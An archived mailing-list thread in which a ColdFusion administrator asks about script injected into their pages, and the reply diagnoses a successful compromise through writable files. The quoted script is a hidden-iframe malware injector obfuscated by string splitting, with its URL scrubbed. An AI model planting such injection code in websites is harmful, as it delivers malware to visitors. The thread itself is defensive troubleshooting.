> Hi there. We've just seen a hack attempt that we > haven't seen before and I wanted to get feedback. > > The symptom is that some script code is inserted at > the bottom of certain pages (e.g. index.cfm). The > script (which has been scrubbed) looks like this: > <script><!-- > var applstrna0 = "<if"; > var applstrna1 = "rame src=http://said7";; > var applstrna2 = ".[BAD URL HERE]"; > var applstrna3 = " width=100 height=0></i"; > var applstrna4 = "frame>"; > document.write(applstrna0+applstrna1+ > applstrna2+applstrna3+applstrna4); > //--></script> > > The script downloads malware, which we obviously > want to prevent. We're trying to determine how it's > getting in their, whether through an old site with > inadequate code or the OS or something else. Any > thoughts? > > This is on a server running IIS 6 / CF7.
My first thought is, if this script has actually been written to your .cfm files, this is a successful hack, not a hack attempt. My second thought is, why are these files writeable in the first place? In the vast majority of CF apps, neither the CF user account nor the IIS user account needs write permission to your CF files. Finally, I'm not aware of any specific worm that does this exact thing. Nor am I aware of any IIS issue that would allow this. My guess is that you have some CF application that allows writes to the filesystem; perhaps one of the CF sample apps? Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321377 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
